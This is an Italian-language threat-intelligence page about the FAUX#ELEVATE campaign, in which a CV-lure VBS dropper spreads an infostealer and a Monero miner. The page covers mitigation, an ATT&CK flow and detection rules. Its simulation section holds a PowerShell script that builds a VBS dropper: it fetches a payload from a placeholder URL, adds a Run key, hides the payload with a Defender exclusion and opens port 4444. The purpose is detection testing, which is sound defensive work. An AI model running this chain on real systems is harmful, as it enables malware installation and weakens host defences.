SOC Prime Bias: Media

26 Mar 2026 16:07

Analisi di FAUX#ELEVATE: Attori di Minaccia Puntano alla Francia con Esca CV per Distribuire Crypto Miners e Infostealer che Puntano agli Ambienti Enterprise

Author Photo
Ruslan Mikhalov Capo della Ricerca sulle Minacce presso SOC Prime linkedin icon Segui
Analisi di FAUX#ELEVATE: Attori di Minaccia Puntano alla Francia con Esca CV per Distribuire Crypto Miners e Infostealer che Puntano agli Ambienti Enterprise
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

Un’operazione di cybercriminalità sfrutta un file di curriculum VBS malevolo per colpire ambienti aziendali francofoni. Il dropper è altamente offuscato ed è progettato per essere eseguito solo su macchine joinate al dominio, dove distribuisce malware per il furto di credenziali insieme a un miner di Monero. La campagna utilizza servizi fidati come Dropbox e siti WordPress compromessi in Marocco per ospitare i payload. I dati rubati vengono esfiltrati tramite SMTP a mail.ru, e il malware rimuove le tracce dopo l’esecuzione per ridurre la visibilità forense.

Indagine

I ricercatori hanno ingegnerizzato al contrario il dropper VBS, scoperto i suoi controlli ambientali e mappato l’intera catena d’infezione multi-stadio, inclusa l’estrazione con 7-Zip, un RAT personalizzato chiamato RuntimeHost.exe, il furto delle credenziali del browser ChromElevator e l’attività di mining XMRig. Hanno anche identificato l’infrastruttura di supporto come indirizzi IP, voci DNS dinamiche e server WordPress compromessi. La persistenza era collegata a chiavi Run del registro e a un’attività pianificata nascosta.

Mitigazione

I difensori dovrebbero bloccare file VBS sospetti e applicare controlli rigidi sugli allegati email. Il monitoraggio dovrebbe concentrarsi sull’esecuzione anomala di wscript.exe, comandi PowerShell che aggiungono esclusioni in Defender e modifiche al registro che influenzano EnableLUA. Le organizzazioni dovrebbero limitare l’SMTP in uscita da applicazioni non di posta e osservare le connessioni alle infrastrutture note di Dropbox e mining-pool. Qualsiasi chiave di registro o attività pianificata identificata dovrebbe essere rimossa o messa in quarantena.

Risposta

I team di sicurezza dovrebbero rilevare la creazione delle chiavi Run “Microsoft Media Service” e “z_MicrosoftEdgeAutoLaunch_2EDFBF”, insieme al compito pianificato nascosto “MicrosoftUpdateService”. Gli allarmi dovrebbero attivarsi sui processi wscript.exe che si collegano a Dropbox o ai domini WordPress documentati. I file malevoli devono essere messi in quarantena, l’host isolato e le credenziali del browser esposte resettate. Una revisione forense dovrebbe poi determinare se i dati rubati sono stati esfiltrati tramite mail.ru.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffddaa classDef technique fill:#c0c0c0 %% Node definitions step_phishing["<b>Tecnica</b> – T1566.001 Phishing: Spearphishing Attachment<br/><b>Descrizione</b>: Email con allegato malevolo che, quando aperto, consegna il payload iniziale."] class step_phishing action step_user_execute["<b>Tecnica</b> – T1204.002 Esecuzione Utente: File Malevolo<br/><b>Descrizione</b>: La vittima esegue il file VBS allegato, attivando il dropper."] class step_user_execute action step_dropper["<b>Tecnica</b> – T1059.005 Visual Basic (VBScript)<br/><b>Tecnica</b> – T1027 File o Informazioni Offuscati<br/><b>Descrizione</b>: Script VBS offuscato agisce come un dropper che estrae componenti aggiuntivi."] class step_dropper action step_domain_check["<b>Tecnica</b> – T1069.002 Scoperta di Gruppi di Permessi: Dominio<br/><b>Descrizione</b>: Verifica se il host è collegato a un dominio per adattare il comportamento."] class step_domain_check technique step_uac_bypass["<b>Tecnica</b> – T1548.002 Bypass Controllo Account Utente<br/><b>Tecnica</b> – T1562.001 Prevenzione: Disabilitare Strumenti di Sicurezza<br/><b>Tecnica</b> – T1564.012 Nascondere Artefatti: Esclusioni Defender<br/><b>Descrizione</b>: Eleva i privilegi, disabilita le difese e aggiunge esclusioni."] class step_uac_bypass technique step_download["<b>Tecnica</b> – T1102 Servizio Web<br/><b>Tecnica</b> – T1102.001 Risolutore Dead Drop<br/><b>Descrizione</b>: Recupera payload aggiuntivi da Dropbox o posizioni web."] class step_download technique step_deploy_toolkit["<b>Strumento</b> – RuntimeHost.exe, XMRig Miner, Ricettatori di Browser<br/><b>Descrizione</b>: Distribuisce componenti per mining, furto di credenziali e ulteriori sfruttamenti."] class step_deploy_toolkit tool step_cred_access["<b>Tecnica</b> – T1555.003 Credenziali dai Browser Web<br/><b>Descrizione</b>: Estrae password e cookie del browser memorizzati."] class step_cred_access technique step_collect_files["<b>Tecnica</b> – T1005 Dati dal Sistema Locale<br/><b>Descrizione</b>: Raccoglie file dal desktop dell’utente per l’esfiltrazione."] class step_collect_files technique step_exfiltration["<b>Tecnica</b> – T1048.002 Esfiltrazione Tramite Protocollo In Cifrato Non C2: SMTP<br/><b>Tecnica</b> – T1071.003 Protocolli Web: Mail Protocols<br/><b>Descrizione</b>: Invia i dati raccolti tramite SMTP cifrato."] class step_exfiltration technique step_resource_hijack["<b>Tecnica</b> – T1496 Appropriazione di Risorse<br/><b>Descrizione</b>: Usa XMRig per minare criptovalute sull’host della vittima."] class step_resource_hijack technique step_process_injection["<b>Tecnica</b> – T1055 Iniezione di Processo<br/><b>Descrizione</b>: Inietta codice malevolo in explorer.exe per nascondere l’attività."] class step_process_injection technique step_c2["<b>Tecnica</b> – T1102 Servizio Web (HTTPS/Dynamic DNS)<br/><b>Descrizione</b>: Mantiene il controllo di comando su traffico web cifrato e porte personalizzate."] class step_c2 technique step_persistence["<b>Tecnica</b> – T1547.001 Chiavi Run di Registro / Cartella di Avvio<br/><b>Tecnica</b> – T1053 Attività Pianificata/Job (Nascosto)<br/><b>Descrizione</b>: Stabilisce la persistenza tramite chiave Run e un’attività pianificata nascosta."] class step_persistence technique step_cleanup["<b>Tecnica</b> – T1070.004 Cancellazione di File<br/><b>Descrizione</b>: Rimuove artefatti e log per evitare il rilevamento."] class step_cleanup technique %% Edge connections step_phishing –>|conduce_a| step_user_execute step_user_execute –>|conduce_a| step_dropper step_dropper –>|conduce_a| step_domain_check step_domain_check –>|conduce_a| step_uac_bypass step_uac_bypass –>|conduce_a| step_download step_download –>|conduce_a| step_deploy_toolkit step_deploy_toolkit –>|abilita| step_cred_access step_deploy_toolkit –>|abilita| step_collect_files step_cred_access –>|combinato_con| step_collect_files step_cred_access –>|supporta| step_exfiltration step_collect_files –>|supporta| step_exfiltration step_deploy_toolkit –>|abilita| step_resource_hijack step_deploy_toolkit –>|abilita| step_process_injection step_process_injection –>|fornisce| step_c2 step_c2 –>|usato_da| step_exfiltration step_deploy_toolkit –>|stabilisce| step_persistence step_persistence –>|seguito_da| step_cleanup step_exfiltration –>|seguito_da| step_cleanup "

Attacco Flow

Rilevazioni

Possibile Comunicazione Tentata di Lookup Dominio IP (via dns)

Team SOC Prime
26 Mar 2026

Disabilitare il Monitoraggio in Tempo Reale di Windows Defender e altre Modifiche alle Preferenze (via cmdline)

Team SOC Prime
26 Mar 2026

Esecuzione Sospetta da Profilo Utente Pubblico (via process_creation)

Team SOC Prime
25 Mar 2026

Possibile Evasione Difesa Estraendo Archivio Cifrato Usando 7-Zip (via cmdline)

Team SOC Prime
25 Mar 2026

LOLBAS WScript / CScript (via process_creation)

Team SOC Prime
25 Mar 2026

Modifica Sospetta delle Esclusioni Defender (via cmdline)

Team SOC Prime
26 Mar 2026

Modifiche Sospette delle Preferenze di Windows Defender (via powershell)

Team SOC Prime
25 Mar 2026

Possibili Punti di Persistenza [ASEPs – Hive Software/NTUSER] (via registry_event)

Team SOC Prime
26 Mar 2026

Attività Pianificata Sospetta (via audit)

Team SOC Prime
25 Mar 2026

Nome File Breve (via cmdline)

Team SOC Prime
25 Mar 2026

Possibile Bypass UAC – Tentativo di Disabilitazione UAC (via registry_event)

Team SOC Prime
25 Mar 2026

File Sospetti nel Profilo Utente Pubblico (via file_event)

Team SOC Prime
26 Mar 2026

IOC (HashSha256) per rilevare: Analisi FAUX#ELEVATE: Gli Attori delle Minacce prendono di Mira la Francia con Esche CV per Distribuire Crypto miner e Infostealer Targeting Enterprise Environments

Regole AI di SOC Prime
26 Mar 2026

IOC (SourceIP) per rilevare: Analisi FAUX#ELEVATE: Gli Attori delle Minacce prendono di Mira la Francia con Esche CV per Distribuire Crypto miner e Infostealer Targeting Enterprise Environments

Regole AI di SOC Prime
26 Mar 2026

IOC (Emails) per rilevare: Analisi FAUX#ELEVATE: Gli Attori delle Minacce prendono di Mira la Francia con Esche CV per Distribuire Crypto miner e Infostealer Targeting Enterprise Environments

Regole AI di SOC Prime
26 Mar 2026

IOC (DestinationIP) per rilevare: Analisi FAUX#ELEVATE: Gli Attori delle Minacce prendono di Mira la Francia con Esche CV per Distribuire Crypto miner e Infostealer Targeting Enterprise Environments

Regole AI di SOC Prime
26 Mar 2026

Rilevazione di Credenziali Elevate e Mining di Criptovalute FAUX [Connessioni di Rete Windows]

Regole AI di SOC Prime
25 Mar 2026

Rilevamento Comunicazione Dominio SMTP e C2 [Connessioni di Rete Windows]

Regole AI di SOC Prime
26 Mar 2026

Rilevamento Persistenza e Furto di Credenziali della Campagna FAUX#ELEVATE [Creazione Processo Windows]

Regole AI di SOC Prime
25 Mar 2026

Rilevamento di Dropper VBS Malevolo e Modifiche Firewall [Creazione Processo Windows]

Regole AI di SOC Prime
26 Mar 2026

Esecuzione Simulazione

Prerequisito: Il Telemetry & Baseline Pre-flight Check deve essere superato.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati ed essere progettati per generare la telemetria esatta attesa dalla logica di rilevamento.

  • Narrazione Attacco & Comandi:

    1. Fase 1 – Rilasciare VBS malevolo: L’attaccante scrive un dropper VBS che scarica un payload di secondo stadio e scrive una chiave run del registro per la persistenza.
    2. Fase 2 – Eseguire VBS tramite wscript.exe con PowerShell come processo genitore, soddisfacendo così la condizione di rilevamento genitore-figlio.
    3. Fase 3 – All’interno del VBS, invocare PowerShell per aggiungere un’esclusione di Microsoft Defender (T1562.001) e Netsh per aprire la porta TCP in entrata 4444 (T1562.004) per il C2.
    4. Fase 4 – Pulire le prove dopo il successo.
  • Script Test di Regressione: (PowerShell – contenuto autonomo; eseguire con diritti amministrativi)

    # -----------------------------------------------------------------------
    # Simulazione Dropper VBS Maligni – attiva la regola Sigma:
    #   Image == "*wscript.exe" AND ParentImage in ("*powershell.exe","*netsh.exe")
    # -----------------------------------------------------------------------
    
    $vbsPath = "$env:Tempmalicious_dropper.vbs"
    $payloadUrl = "http://example.com/payload.exe"   # URL segnaposto
    $payloadPath = "$env:Temppayload.exe"
    
    # 1. Creare un VBS maligno che:
    #    • Scarica un payload
    #    • Scrive una chiave Run per persistenza
    #    • Chiama PowerShell per aggiungere esclusione Defender
    #    • Chiama Netsh per aprire una regola firewall
    $vbsContent = @"
    Set objXML = CreateObject("Microsoft.XMLHTTP")
    objXML.Open "GET", "$payloadUrl", False
    objXML.Send
    If objXML.Status = 200 Then
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Open
    objStream.Write objXML.ResponseBody
    objStream.SaveToFile "$payloadPath", 2
    End If

‘ Persist via Run key Set objShell = CreateObject(“WScript.Shell”) objShell.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious”, “$payloadPath”

‘ Defender exclusion via PowerShell (executed inline) objShell.Run “powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'“”, 0, True

‘ Open firewall port 4444 via Netsh (executed inline) objShell.Run “netsh.exe advfirewall firewall add rule name="MaliciousPort” dir=in action=allow protocol=TCP localport=4444″, 0, True “@

Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Lanciare il VBS con PowerShell come processo genitore
Write-Host "[*] Avviando VBS malevolo tramite wscript.exe (genitore: PowerShell)"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait

# 3. Verificare che la regola firewall sia stata aggiunta (opzionale)
netsh advfirewall firewall show rule name=MaliciousPort

# 4. Ripulire gli artefatti (payload & VBS) – lasciato per sezione di pulizia separata
Write-Host "[+] Simulazione completata. Rivedere gli allarmi nel SIEM."
  • Comandi di Pulizia: (eseguire dopo la verifica)

    # Rimuovere la regola firewall
    netsh advfirewall firewall delete rule name="MaliciousPort"
    
    # Rimuovere l'esclusione Defender
    powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'"
    
    # Cancellare la chiave Run di persistenza
    reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f
    
    # Eliminare i file
    Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force
    Remove-Item -Path "$env:Temppayload.exe" -Force
    
    Write-Host "[+] Pulizia completata."